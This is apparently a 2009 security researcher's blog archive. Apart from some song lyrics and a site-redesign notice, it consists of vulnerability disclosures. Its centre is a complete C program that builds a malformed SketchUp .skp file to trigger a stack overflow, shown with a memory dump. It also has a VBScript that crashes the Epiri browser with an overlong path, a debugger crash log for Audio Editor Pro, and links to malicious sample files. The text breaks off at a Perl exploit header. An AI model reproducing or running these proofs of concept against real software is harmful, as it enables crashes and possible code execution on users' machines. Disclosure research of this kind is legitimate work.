30 November, 2009

Afternoon delight

Gonna find my baby, gonna hold her tight
gonna grab some afternoon delight.
My motto's always been; when it's right, it's right.
Why wait until the middle of a cold dark night.
When everything's a little clearer in the light of day.
And you know the night is always gonna be there any way.

Thinkin' of you's workin' up my appetite
looking forward to a little afternoon delight.
Rubbin' sticks and stones together makes the sparks ingite
and the thought of rubbin' you is getting so exciting.

Sky rockets in flight. Afternoon delight. Afternoon delight.

21 October, 2009

Started redesigning zeroscience.org

A bit busy these days so i'll post the new design when it is finished...

twitter: http://www.twitter.com/zeroscience

t00t.

31 July, 2009

Express In The Black

Google SketchUp Pro 7.0 Model File Handling Remote Stack Overflow PoC






/*


Title:

Google SketchUp Pro 7.0 Model File Handling Remote Stack Overflow PoC



Vendor:

Google Inc. (http://www.google.com)



Product Web Page:

http://www.sketchup.com
http://sketchup.google.com



Current Version:

7.0.10247



Summary:

Google SketchUp Pro 7 is a suite of powerful features and
applications for streamlining your professional 3D workflow.



Description:

Google SketchUp Pro 7.0 suffers from a stack overflow vulnerability. It fails
to handle the .skp file format resulting in crash overflowing the memory stack,
poping out the crash reporter tool from Google.

EBX, ESI and EDI gets overwritten (depending of the offset). The issue is
triggered when double-clicking the file or thru Open menu by just selecting
the file. Same happens with the 2 other apps included in this Pro version of
Google SketchUp. LayOut 2.0 (current version: 2.0.10247) suffers from the same
issue when insering the .skp file by File -> Insert -> evil.skp file. Style
Builder 1.0 (current version: 1.0.10247) by going Preview -> Change Model ->
evil.skp file.

Another issue is the DLL files provided with the Google SketchUp Pro package.
ThumbsUp.dll and xerces-c_2_6.dll mingles with the Thumbnail view from Microsoft.
If you select the created "SketchUp_PoC.skp" file, explorer.exe instantly crashes
and restarts. Every application that uses Open Dialog Boxes will crash if you view
the folder containing the PoC file in thumbnails view. Attaching files on e-mail
thru Mozilla Firefox, viewing thumbnails of the PoC crashes Firefox with it's crash
reporter, MS Office, Skype, MSN Messenger, etc...you name it.



Vendor Notification Status:

Vendor notified, fix scheduled to be included in the next upcoming release of Google
SketchUp product.



Tested On Microsoft Windows XP Professional Service Pack 3 (English)



Vulnerability Discovered By:

Gjoko 'LiquidWorm' Krstic

liquidworm gmail com

Zero Science Lab - http://www.zeroscience.org/

22.07.2009



---------- Memory Snip ----------

0012b310: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b330: 41414141 41414141 41414141 41414141 00120041 78138ced 38740c4c fffffffe
0012b350: 78134c58 0012b384 7c809abc 7c809ac6 0012eee0 0012eee0 02c85744 0012b360
0012b370: 02c85744 0012eda8 7c839ac0 7c809ad0 ffffffff 7c809ac6 7c809ac6 0084bdac
0012b390: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b3b0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b3d0: 00120041 78138ced 38740c4c fffffffe 78134c58 0012b414 7c809abc 7c809ac6
0012b3f0: 0012eee0 0012eee0 02c85744 0012b3f0 02c85744 0012eda8 7c839ac0 7c809ad0
0012b410: ffffffff 7c809ac6 7c809ac6 0084bdac 41414141 41414141 41414141 41414141
0012b430: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b450: 41414141 41414141 41414141 41414141 00120041 78138ced 38740c4c fffffffe
0012b470: 78134c58 0012b4a4 7c809abc 7c809ac6 0012eee0 0012eee0 02c85744 0012b480
0012b490: 02c85744 0012eda8 7c839ac0 7c809ad0 ffffffff 7c809ac6 7c809ac6 0084bdac
0012b4b0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b4d0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b4f0: 00120041 78138ced 38740c4c fffffffe 78134c58 0012b534 7c809abc 7c809ac6
0012b510: 0012eee0 0012eee0 02c85744 0012b510 02c85744 0012eda8 7c839ac0 7c809ad0
0012b530: ffffffff 7c809ac6 7c809ac6 0084bdac 41414141 41414141 41414141 41414141
0012b550: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b570: 41414141 41414141 41414141 41414141 00120041 78138ced 38740c4c fffffffe
0012b590: 78134c58 0012b5c4 7c809abc 7c809ac6 0012eee0 0012eee0 02c85744 0012b5a0
0012b5b0: 02c85744 0012eda8 7c839ac0 7c809ad0 ffffffff 7c809ac6 7c809ac6 0084bdac
0012b5d0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b5f0: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141
0012b610: 00120041 78138ced 38740c4c fffffffe 78134c58 0012b654 7c809abc 7c809ac6

--------- /Memory Snip ----------


*/


#include
#include
#include
#include

#define BUFF_S 598897
#define SIZE_S 600858
#define FILE_N "SketchUp_PoC.skp"

FILE *filetzio;

char header[1961] = {

0xFF, 0xFE, 0xFF, 0x0E, 0x53, 0x00, 0x6B, 0x00, 0x65, 0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00,
0x55, 0x00, 0x70, 0x00, 0x20, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64, 0x00, 0x65, 0x00, 0x6C, 0x00,
0xFF, 0xFE, 0xFF, 0x0B, 0x7B, 0x00, 0x37, 0x00, 0x2E, 0x00, 0x30, 0x00, 0x2E, 0x00, 0x31, 0x00,
0x30, 0x00, 0x32, 0x00, 0x34, 0x00, 0x37, 0x00, 0x7D, 0x00, 0xA5, 0x64, 0x9C, 0x7A, 0x5F, 0x28,
0x37, 0x4A, 0x8F, 0xBD, 0x7E, 0x93, 0x1F, 0xBA, 0x22, 0x92, 0xFF, 0xFE, 0xFF, 0x00, 0xA5, 0xB6,
0x67, 0x4A, 0xFF, 0xFF, 0x00, 0x00, 0x0B, 0x00, 0x43, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E,
0x4D, 0x61, 0x70, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x41, 0x00, 0x72, 0x00, 0x63, 0x00, 0x43,
0x00, 0x75, 0x00, 0x72, 0x00, 0x76, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x0A, 0x43, 0x00, 0x41, 0x00, 0x74, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75,
0x00, 0x74, 0x00, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x13, 0x43, 0x00, 0x41,
0x00, 0x74, 0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00, 0x74, 0x00, 0x65,
0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65,
0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x43, 0x00, 0x41, 0x00, 0x74,
0x00, 0x74, 0x00, 0x72, 0x00, 0x69, 0x00, 0x62, 0x00, 0x75, 0x00, 0x74, 0x00, 0x65, 0x00, 0x4E,
0x00, 0x61, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x64, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x10, 0x43, 0x00, 0x42, 0x00, 0x61, 0x00, 0x63, 0x00, 0x6B, 0x00, 0x67, 0x00, 0x72, 0x00, 0x6F,
0x00, 0x75, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x49, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65,
0x00, 0x09, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x07, 0x43, 0x00, 0x43, 0x00, 0x61, 0x00, 0x6D,
0x00, 0x65, 0x00, 0x72, 0x00, 0x61, 0x00, 0x05, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0A, 0x43,
0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x0B, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43, 0x00, 0x43, 0x00, 0x6F,
0x00, 0x6D, 0x00, 0x70, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x42,
0x00, 0x65, 0x00, 0x68, 0x00, 0x61, 0x00, 0x76, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x05,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x14, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x44, 0x00, 0x65, 0x00, 0x66,
0x00, 0x69, 0x00, 0x6E, 0x00, 0x69, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x0A,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6D, 0x00, 0x70,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x73,
0x00, 0x74, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x63, 0x00, 0x65, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x15, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72,
0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x47, 0x00, 0x65,
0x00, 0x6F, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x74, 0x00, 0x72, 0x00, 0x79, 0x00, 0x00, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x11, 0x43, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74,
0x00, 0x72, 0x00, 0x75, 0x00, 0x63, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x4C,
0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43,
0x00, 0x43, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x74, 0x00, 0x72, 0x00, 0x75, 0x00, 0x63,
0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x50, 0x00, 0x6F, 0x00, 0x69, 0x00, 0x6E,
0x00, 0x74, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x06, 0x43, 0x00, 0x43, 0x00, 0x75,
0x00, 0x72, 0x00, 0x76, 0x00, 0x65, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x43,
0x00, 0x44, 0x00, 0x65, 0x00, 0x66, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x69, 0x00, 0x74, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x73, 0x00, 0x74, 0x00, 0x00, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x04, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x62, 0x00, 0x03, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E,
0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x10, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x61, 0x00, 0x72,
0x00, 0x06, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D,
0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x52, 0x00, 0x61,
0x00, 0x64, 0x00, 0x69, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x0F, 0x43, 0x00, 0x44, 0x00, 0x69, 0x00, 0x6D, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x53, 0x00, 0x74, 0x00, 0x79, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x04,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0F, 0x43, 0x00, 0x44, 0x00, 0x72, 0x00, 0x61, 0x00, 0x77,
0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x45, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x6D, 0x00, 0x65,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x05, 0x43, 0x00, 0x45,
0x00, 0x64, 0x00, 0x67, 0x00, 0x65, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x08, 0x43,
0x00, 0x45, 0x00, 0x64, 0x00, 0x67, 0x00, 0x65, 0x00, 0x55, 0x00, 0x73, 0x00, 0x65, 0x00, 0x01,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x07, 0x43, 0x00, 0x45, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x69,
0x00, 0x74, 0x00, 0x79, 0x00, 0x03, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x05, 0x43, 0x00, 0x46,
0x00, 0x61, 0x00, 0x63, 0x00, 0x65, 0x00, 0x03, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x43,
0x00, 0x46, 0x00, 0x61, 0x00, 0x63, 0x00, 0x65, 0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74,
0x00, 0x75, 0x00, 0x72, 0x00, 0x65, 0x00, 0x43, 0x00, 0x6F, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64,
0x00, 0x73, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0C, 0x43, 0x00, 0x46, 0x00, 0x6F,
0x00, 0x6E, 0x00, 0x74, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65,
0x00, 0x72, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x06, 0x43, 0x00, 0x47, 0x00, 0x72,
0x00, 0x6F, 0x00, 0x75, 0x00, 0x70, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x06, 0x43,
0x00, 0x49, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x06, 0x43, 0x00, 0x4C, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65, 0x00, 0x72, 0x00, 0x02,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x4C, 0x00, 0x61, 0x00, 0x79, 0x00, 0x65,
0x00, 0x72, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72,
0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x05, 0x43, 0x00, 0x4C, 0x00, 0x6F, 0x00, 0x6F,
0x00, 0x70, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x4D, 0x00, 0x61,
0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x69, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x0C, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72,
0x00, 0x69, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67,
0x00, 0x65, 0x00, 0x72, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x50,
0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x4C, 0x00, 0x69, 0x00, 0x73, 0x00, 0x74, 0x00, 0x01,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0B, 0x43, 0x00, 0x50, 0x00, 0x6F, 0x00, 0x6C, 0x00, 0x79,
0x00, 0x6C, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x65, 0x00, 0x33, 0x00, 0x64, 0x00, 0x00, 0x00, 0x00,
0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x52, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x74,
0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x68, 0x00, 0x69, 0x00, 0x70, 0x00, 0x00,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x52, 0x00, 0x65, 0x00, 0x6C, 0x00, 0x61,
0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73, 0x00, 0x68, 0x00, 0x69, 0x00, 0x70,
0x00, 0x4D, 0x00, 0x61, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x11, 0x43,
0x00, 0x52, 0x00, 0x65, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x65, 0x00, 0x72, 0x00, 0x69, 0x00, 0x6E,
0x00, 0x67, 0x00, 0x4F, 0x00, 0x70, 0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x73,
0x00, 0x23, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x53, 0x00, 0x65, 0x00, 0x63,
0x00, 0x74, 0x00, 0x69, 0x00, 0x6F, 0x00, 0x6E, 0x00, 0x50, 0x00, 0x6C, 0x00, 0x61, 0x00, 0x6E,
0x00, 0x65, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0B, 0x43, 0x00, 0x53, 0x00, 0x68,
0x00, 0x61, 0x00, 0x64, 0x00, 0x6F, 0x00, 0x77, 0x00, 0x49, 0x00, 0x6E, 0x00, 0x66, 0x00, 0x6F,
0x00, 0x07, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x07, 0x43, 0x00, 0x53, 0x00, 0x6B, 0x00, 0x46,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x74, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43,
0x00, 0x53, 0x00, 0x6B, 0x00, 0x65, 0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00, 0x43, 0x00, 0x53,
0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0E, 0x43, 0x00, 0x53, 0x00, 0x6B, 0x00, 0x65,
0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00, 0x55, 0x00, 0x70, 0x00, 0x4D, 0x00, 0x6F, 0x00, 0x64,
0x00, 0x65, 0x00, 0x6C, 0x00, 0x16, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0D, 0x43, 0x00, 0x53,
0x00, 0x6B, 0x00, 0x65, 0x00, 0x74, 0x00, 0x63, 0x00, 0x68, 0x00, 0x55, 0x00, 0x70, 0x00, 0x50,
0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43,
0x00, 0x53, 0x00, 0x6B, 0x00, 0x70, 0x00, 0x53, 0x00, 0x74, 0x00, 0x79, 0x00, 0x6C, 0x00, 0x65,
0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x10, 0x43, 0x00, 0x53, 0x00, 0x6B, 0x00, 0x70,
0x00, 0x53, 0x00, 0x74, 0x00, 0x79, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E,
0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF,
0x05, 0x43, 0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x09, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x53, 0x00, 0x74,
0x00, 0x79, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x05, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x08, 0x43,
0x00, 0x54, 0x00, 0x65, 0x00, 0x78, 0x00, 0x74, 0x00, 0x75, 0x00, 0x72, 0x00, 0x65, 0x00, 0x06,
0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x54, 0x00, 0x68, 0x00, 0x75, 0x00, 0x6D,
0x00, 0x62, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x69, 0x00, 0x6C, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x07, 0x43, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x74, 0x00, 0x65, 0x00, 0x78,
0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x09, 0x43, 0x00, 0x56, 0x00, 0x69, 0x00, 0x65,
0x00, 0x77, 0x00, 0x50, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x0B, 0x00, 0x00, 0x00, 0xFF,
0xFE, 0xFF, 0x0A, 0x43, 0x00, 0x57, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6D,
0x00, 0x61, 0x00, 0x72, 0x00, 0x6B, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x11, 0x43,
0x00, 0x57, 0x00, 0x61, 0x00, 0x74, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6D, 0x00, 0x61, 0x00, 0x72,
0x00, 0x6B, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x6E, 0x00, 0x61, 0x00, 0x67, 0x00, 0x65, 0x00, 0x72,
0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFE, 0xFF, 0x12, 0x45, 0x00, 0x6E, 0x00, 0x64, 0x00, 0x2D,
0x00, 0x4F, 0x00, 0x66, 0x00, 0x2D, 0x00, 0x56, 0x00, 0x65, 0x00, 0x72, 0x00, 0x73, 0x00, 0x69,
0x00, 0x6F, 0x00, 0x6E, 0x00, 0x2D, 0x00, 0x4D, 0x00, 0x61, 0x00, 0x70, 0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x00, 0x00, 0xB0, 0x04, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x03,
0x00, 0x04, 0x00, 0x43, 0x44, 0x69, 0x62, 0x04, 0x00, 0x00, 0x00, 0xFA, 0x02, 0x00, 0x00, 0x89,
0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00, 0x00, 0x00, 0x0D, 0x49, 0x48, 0x44, 0x52, 0x00,
0x00, 0x00, 0x80, 0x00, 0x00, 0x00, 0x44, 0x08, 0x06, 0x00, 0x00, 0x00, 0x49, 0x47, 0x3D, 0x69,
0x00, 0x00, 0x00, 0x04, 0x73, 0x42, 0x49, 0x54, 0x08, 0x08, 0x08, 0x08, 0x7C, 0x08, 0x64, 0x88,
0x00, 0x00, 0x00, 0x09, 0x70, 0x48, 0x59, 0x73, 0x00
};


int main(int argc, char *argv[])

{
printf("\n");
printf("################################################################################");
printf("\nGoogle SketchUp Pro 7.0 (.skp file) Remote Stack Overflow Proof Of Concept\n");
printf("--------------------------------------------------------------------------------");
printf("\t\tby LiquidWorm - 2009\n\n");
printf("################################################################################");

char sploit[SIZE_S];
char buffer[BUFF_S];

memset(buffer,0x41,BUFF_S);

memcpy(sploit,header,strlen(header));
memcpy(sploit+strlen(header),buffer,BUFF_S);

filetzio = fopen(FILE_N,"wb");

if(filetzio==NULL)
{
perror ("Oops! Can't open file.\n");
}

fwrite(sploit,1,sizeof(sploit),filetzio);
fclose(filetzio);

sleep(2);
printf("\n----> Creating PoC SketchUp Model File...\n");
sleep(1);
printf("\n----> File: %s successfully generated!\n", FILE_N);

return 0;

}










































http://zeroscience.org/codes/google1.txt (Perl)
http://zeroscience.org/codes/google2.txt (C)


t00t!

30 July, 2009

Epiri Professional Web Browser 3.0 Remote Crash Exploit



' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Notiz: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)

' Vulnerable strings:

' file://
' C::
' C:\AAAA...AAAA [257]
'

' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009


' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

Dim crash

Set crash = CreateObject("WScript.Shell")

With crash

Do Until Success = True

Success = crash.AppActivate("Epiri Professional 3.0")

Loop

'.SendKeys "file://"
'.SendKeys "C::"
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

.SendKeys "~" 'Return

End With

Wscript.Quit








http://zeroscience.org/codes/epiri_crash.txt
http://zeroscience.org/codes/epiri_crash.vbs

27 July, 2009

CompleteFTP Server 2.2.1 Memory Consumption Vulnerability

Vendor: http://www.enterprisedt.com

Viewing log files, hangs the GUI, sys out of memory...

15 July, 2009

Audio Editor Pro 2.91 Remote Memory Corruption PoC



Title: Audio Editor Pro 2.91 Remote Memory Corruption PoC

Product web page: http://www.mightsoft.com/

Summary: Audio Editor Pro is a visual multifunctional audio files editor for Microsoft Windows

Tested on: MS Windows XP Pro SP3 (EN)


--------------------------windbg--------------------------

(2bc.f5c): Unknown exception - code e0000001 (first chance)
(2bc.f5c): Unknown exception - code e0000001 (first chance)
(2bc.f5c): Unknown exception - code e0000001 (first chance)
(2bc.f5c): C++ EH exception - code e06d7363 (first chance)
(2bc.f5c): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0012ec04 ebx=80040303 ecx=00000000 edx=00000000 esi=0012ec94 edi=0012ec94
eip=7c812aeb esp=0012ec00 ebp=0012ec54 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00040206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
0:000> g
WARNING: Continuing a non-continuable exception
(2bc.f5c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=80040303 ebx=80040303 ecx=00000000 edx=00000000 esi=00000000 edi=00d2ffb0
eip=0043a0c1 esp=0012eca0 ebp=0012ecb4 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050206
*** ERROR: Module load completed but symbols could not be loaded for [path]\areditor.exe
areditor+0x3a0c1:
0043a0c1 83660c00 and dword ptr [esi+0Ch],0 ds:0023:0000000c=????????

-------------------------/windbg--------------------------


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
http://www.zeroscience.org/
16.07.2009




PoC: 1. http://zeroscience.org/codes/aimp2_evil.mp3
2. http://milw0rm.com/sploits/2009-aimp2_evil.mp3
3. http://securityreason.com/download/11/13





http://www.zeroscience.org/codes/aeditor_mc.txt

Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities

#!/usr/bin/perl
#
#
# Title: Zortam MP3 Media Studio 9.40 Multiple Memory Corruption Vulnerabilities
#
